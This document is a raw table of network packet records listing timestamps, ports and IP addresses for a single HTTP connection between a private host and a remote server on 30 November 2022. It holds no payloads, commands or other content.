Nov 30, 2022 00:10:04.509978056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.548715115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.548928022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.549756050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.589503050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.694690943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.694907904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.722865105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.761621952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762178898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762217045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762237072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762262106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762298107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762319088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762325048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762351036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762366056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762372971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762396097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762401104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762422085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.762438059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.762460947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.800975084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801017046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801089048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801126957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801203966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801224947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801260948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801296949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801311016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801341057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801362991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801369905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801384926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801392078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801428080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801451921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801453114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801472902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801482916 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801496029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801517010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801517963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801541090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801574945 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801589966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801599979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801621914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801631927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801645041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801661015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801666975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.801701069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.801937103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840192080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840213060 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840240002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840260983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840298891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840318918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840343952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840363979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840401888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840419054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840430021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840451002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840475082 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840476036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840497017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840523005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840543985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840563059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840573072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840585947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840595961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840616941 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840636969 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840639114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840657949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840678930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840682030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840699911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840730906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840795040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840815067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840846062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840853930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840873957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840878963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840893984 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840914965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840923071 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840934992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840955973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840958118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.840976000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.840996981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841028929 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841029882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841028929 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841048002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841053009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841068029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841082096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841089010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841106892 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841109991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841130018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841155052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841159105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841193914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.841195107 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841238022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.841264009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.878962994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.878985882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879013062 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879033089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879097939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879108906 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879129887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879153013 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879163027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879167080 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879184008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879215956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879230976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879250050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879250050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879251957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879271984 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879292965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879316092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879316092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879339933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879352093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879362106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879384041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879404068 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879404068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879436970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879441023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879457951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879477978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879496098 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879498959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879518032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879533052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879554033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879585028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879585028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879650116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879677057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879697084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879717112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879736900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879738092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879738092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879756927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879770994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879780054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879796028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879801035 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879810095 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879822016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879843950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879851103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879865885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879885912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879889011 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879904985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879914045 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879952908 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879972935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.879990101 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879990101 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.879996061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880017042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880037069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880057096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880078077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880080938 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880099058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880120039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880130053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880141020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880148888 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880162001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880182028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880194902 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880203962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880218029 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880225897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880244970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880253077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880265951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880289078 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880301952 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880310059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880331039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880341053 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880352020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880356073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880373001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880393982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880398989 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880398989 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880417109 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880419970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880440950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880444050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880460978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880479097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880479097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880481958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880502939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880510092 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880522966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880537987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880537987 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880543947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880563974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880584955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880588055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880588055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880605936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880625963 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880635023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880635023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880645037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880665064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880683899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880698919 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880705118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880712032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880724907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880728006 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880747080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880758047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880775928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880780935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880796909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880817890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880836964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880856991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880877972 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880882978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880898952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.880923033 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880985022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.880985022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.917922974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.917947054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.917964935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.917984962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918076038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918117046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918138981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918159008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918179989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918181896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918200970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918212891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918212891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918225050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918246031 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918289900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918309927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.918370008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918370008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.918370008 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919133902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919157982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919183969 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919203997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919214964 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919224977 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919245958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919246912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919297934 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919333935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919378996 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919400930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919465065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919485092 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919517994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919532061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919538021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919560909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919568062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919580936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919594049 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919600010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919619083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919622898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919642925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919644117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919661999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919672966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919692993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919701099 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919722080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919742107 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919759989 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919764042 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919785976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919795036 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919806004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919826984 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919832945 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919848919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919857979 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919869900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919882059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919893026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919907093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919914961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919931889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919934988 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919955969 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919955969 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919975996 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.919985056 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.919996023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920016050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920017004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920036077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920049906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920061111 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920074940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920080900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920101881 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920104980 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920123100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920125961 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920142889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920155048 CET	49708	80	192.168.2.7	88.198.94.71
